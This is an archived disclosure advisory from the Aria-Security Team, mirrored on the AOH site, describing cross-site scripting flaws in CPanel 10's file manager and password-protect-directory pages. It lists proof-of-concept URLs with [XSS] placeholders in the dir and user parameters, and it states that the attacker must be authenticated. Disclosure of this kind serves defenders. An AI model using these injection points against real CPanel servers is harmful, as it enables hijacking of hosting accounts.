AOH :: Web :: Adminware, Control Panels :: B06-5717.HTM

CPanel Multiple Cross Site Scription

CPanel Multiple Cross Site Scription
CPanel Multiple Cross Site Scription



#Aria-Security Team Advisory
# For English > 
# For Persian > 
#Original Advisory : http://aria-security.net/advisory/cpanel.txt 
#-----------------------------------------------------------
#Software: CPanel
#Tested On CPanel 10
#CPanel file Manager:
#PoC:
http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS] 
#CPanel Password Protect DIRS :
#PoC: 
http://target.com:2082/frontend/[servername]/htaccess/newuser.html?user=[XSS]&pass=&dir=A VALID FOLDER 
*Press Go Back (hyperlink)
#In Password Protected DIR:
#PoC:
http://www.target:2082/frontend/[servername]/htaccess/newuser.html?user=[XSS]&pass=&dir=[XSS] 
#
#P.S : Attacker must be authenticated
#
#Contact: Advisory@aria-security.net 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.